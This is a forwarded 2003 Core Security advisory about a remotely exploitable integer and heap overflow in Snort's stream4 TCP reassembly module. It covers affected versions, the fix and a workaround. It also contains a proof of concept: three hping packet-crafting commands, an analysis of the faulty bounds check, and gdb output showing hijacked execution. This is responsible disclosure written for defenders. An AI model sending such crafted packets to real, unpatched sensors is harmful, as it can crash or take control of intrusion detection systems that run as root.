[Fwd: CORE-2003-0307: Snort TCP Stream Reassembly Integer Overflow Vulnerability]

[Jose Vicente Nunez Z <josevnz () newbreak com>]

-- 
José Vicente Núñez Zuleta (josevnz at newbreak dot com)
Newbreak LLC System Administrator
http://www.newbreak.com
RHCE, SCJD, SCJP
> --- Begin Message ---
>
>
> From: CORE Security Technologies Advisories <advisories () coresecurity com>
>
> Date: Tue, 15 Apr 2003 16:01:41 -0300
>
>
>                 Core Security Technologies Advisory
>                     http://www.coresecurity.com
>
>      Snort TCP Stream Reassembly Integer Overflow Vulnerability
>
>
> Date Published: 2003-04-15
>
> Last Update: 2003-04-15
>
> Advisory ID: CORE-2003-0307
>
> Bugtraq ID: 7178
>
> CVE Name: None currently assigned
>
> Title: Snort TCP Stream Reassembly Integer Overflow Vulnerability
>
> Class: Failure to handle exceptional conditions
>
> Remotely Exploitable: Yes
>
> Locally Exploitable: No
>
> Advisory URL:
>  http://www.coresecurity.com/common/showdoc.php?idx=313&idxseccion=10
>
> Release Mode: COORDINATED RELEASE
>
>
> *Vulnerability Description*
>
>  Snort is a very popular open source network intrusion detection
>  system.  It can detect hundreds of different attacks by analyzing
>  packets received on the network and applying a database of pattern
>  matching rules.  Snort also comes with modules and plugins that
>  perform a variety of functions such as protocol analysis, output,
>  and logging.  For more information about Snort visit
>  http:///www.snort.org
>
>  The stream4 preprocessor module is a Snort plugin that reassembles
>  TCP traffic before passing it on to be analyzed.  It also detects
>  several types of IDS evasion attacks.
>
>  We have discovered an exploitable heap overflow in this module
>  resulting from sequence number calculations that overflow a
>  32 bit integer variable.
>
>  To exploit this vulnerability an attacker does not need to know on
>  which host the Snort sensor is running.  It is only necessary to
>  guess where to send traffic that the Snort sensor will 'see' and
>  analyze.
>
>  Successful exploitation of this vulnerability could lead to
>  execution of arbitrary commands on a system running the Snort sensor
>  with the privileges of the user running the snort process (usually
>  root), a denial of service attack against the snort sensor and
>  possibly the implementation of IDS evasion techniques that would
>  prevent the sensor from detecting attacks on the monitored network.
>
>
> *Vulnerable packages:*
>
>  . Snort 2.0 versions prior to RC1
>  . Snort 1.9.x
>  . Snort 1.8.x
>  . IDSes and other security appliances using snort technology embedded.
>
>
> *Solution/Vendor Information/Workaround:*
>
>  Snort 2.0 released on April 14th, is available and includes fixes
>  to the vulnerability reported in this advisory.
>
>  The source code package for Snort 2.0 can be obtained from
>  http://www.snort.org/dl/snort-2.0.0.tar.gz
>
>  Binaries can be obtained from  http://www.snort.org/dl/binaries
>
>  A workaround for this bug is to disable the TCP stream reassembly
>  module.  This can be done by commenting out the following line from
>  your Snort configuration file (usually 'snort.conf') and sending
>  a SIGHUP signal to the running  Snort process:
>
>         preprocessor stream4_reassemble
>
>  Although this will prevent the vulnerability from being exploited it
>  will make it possible to easily evade the IDS by fragmenting attacks
>  across multiple TCP segments.
>
>
> *Credits:*
>
>  This vulnerability was discovered by Bruce Leidl, Juan Pablo Martinez
>  Kuhn and Alejandro David Weil from Core Security Technologies during
>  Bugweek 2003 (March 3-7, 2003).
>
>  We would like to thank Marty Roesch from Sourcefire Inc. for
>  addressing this issue and fixing the problem in Snort.
>
>
> *Technical Description - Exploit/Concept Code:*
>
>  The vulnerability can be demonstrated by sending some specially crafted
>  packets with the free command line packet creating utility called hping
>  which you can download from http://www.hping.org.
>
>  In the following example 192.168.22.6 and 192.168.22.2 are both hosts
>  that actually exist and are on a network monitored by the Snort sensor.
>
>  Two packets are sent from 192.168.22.2 to port 111 on host 192.168.22.6
>  and then one packet is sent back to host 192.168.22.2 from  192.168.22.6.
>
>  hping 192.168.22.2 -a 192.168.22.6 -s 3339 -p 111 --ack --rst -c 1 -d 0x1 \\
>   --setseq 0xffff0023 --setack 0xc0c4c014
>
>  hping 192.168.22.2 -a 192.168.22.6 -s 3339 -p 111 --ack --rst -c 1 -d 0xF00 \\
>   --setseq 0xffffffff --setack 0xc0c4c014
>
>  hping 192.168.22.6 -a 192.168.22.2 -s 111 -p 3339 --ack -c 1 -d 0 \\
>   --setseq 0xc0c4c014 --setack 0xffffffff
>
>  The first packet sets up a new Session structure in the stream4 module
>  and the important detail is that the base_seq  in the client Stream is
>  set to 0xffff0023.
>
>  The second packet sends 3840 bytes of data in a large fragmented IP
>  datagram.  This adds a packet with the sequence number 0xffffffff to the
>  tree of stream data to be reassembled.
>
>  The last packet sets the last_ack of the client stream to 0xffffffff
>  and since the difference between the base_seq and the last_ack of the
>  client stream is very large it is flushed for analysis.
>
>  When the stream is reassembled and the second large packet is added,
>  the stream is set up with these values in  TraverseFunc() in
>  spp_stream4.c.
>
>         s->base_seq = 0xffff0023
>         s->next_seq = 0xffff0024
>         s->last_ack = 0xffffffff
>
>  The packet itself has these values
>
>         spd->seq_num = 0xffffffff
>         spd->payload_size = 0xf00
>
>
>  The first sanity check makes sure that the packet sequence number is
>  between the base_seq and last_ack values for the stream
>
>  spp_stream4.c:Traversefunc()
>
>     if(spd->seq_num < s->base_seq || spd->seq_num > s->last_ack)
>
>        This condition must evaluate to FALSE or the function returns.
>
>
>  Then there is a check that is supposed to detect conditions that would
>  overflow the buffer so that later code can handle it by truncating
>  the data.
>
>  The packet sequence number must be greater than both the base_seq and
>  next_seq for the stream
>
>         spd->seq_num >= s->base_seq  &&
>         spd->seq_num >= s->next_seq &&
>
>
>  This condition is supposed to detect a packet that will overflow the
>  buffer (since the difference between base_seq  and last_ack has already
>  been verified to be smaller than the buffer size).  However, if
>  (spd->seq_num +  spd->payload_size) overflows a 32 bit integer value
>  the expression evaluates to a small integer and the condition is passed.
>
>         (spd->seq_num + spd->payload_size) <= s->last_ack
>
>
>  Then the offset in the buffer to copy the packet to is calculated.
>  With our values, this becomes 0xffdc which is near to the end of
>  buffer.
>
>         offset = spd->seq_num - s->base_seq       (offset = 0xffdc)
>
>
>  This memcpy() copies spd->payload_size (0xf00) bytes of data starting at
>  buf + offset (near the end of the buffer)  overflowing into the heap.
>
>         memcpy(buf + offset, spd->payload, spd->payload_size)
>
>
>  On our Linux build of Snort 1.9.0 this overflow conveniently overwrites a
>  function pointer that is called immediately after the reassembly
>  preprocessor returns:
>
>         80          while(idx != NULL)
>         (gdb)
>         82              assert(idx->func != NULL);
>         (gdb)
>         83              idx->func(p);
>         (gdb)
>
>         Program received signal SIGSEGV, Segmentation fault.
>         0x58585858 in ?? ()
>
>  We have successfully exploited this vulnerability and produced an exploit
>  that functions on several different binaries of Snort 1.9.0 and 1.9.1.  It
>  is available as a module for our penetration testing product Core Impact.
>
>
> *About Core Security Technologies*
>
>  Core Security Technologies develops strategic security solutions for
>  Fortune 1000 corporations, government agencies and military
>  organizations. The company offers information security software and
>  services designed to assess risk and protect and manage information assets.
>
>  Headquartered in Boston, MA, Core Security Technologies can be reached at
>  617-399-6980 or on the Web at http://www.coresecurity.com.
>
>  To learn more about CORE IMPACT, the first comprehensive penetration
>  testing framework, visit http://www.coresecurity.com/products/coreimpact
>
>
> *DISCLAIMER:*
>
>  The contents of this advisory are copyright (c) 2003 CORE Security Technologies
>  and may be distributed freely provided that no fee is charged for this
>  distribution and proper credit is given.
>
> $Id: snort-stream4-advisory.txt,v 1.7 2003/04/15 18:49:01 carlos Exp $
>
>
> --- End Message ---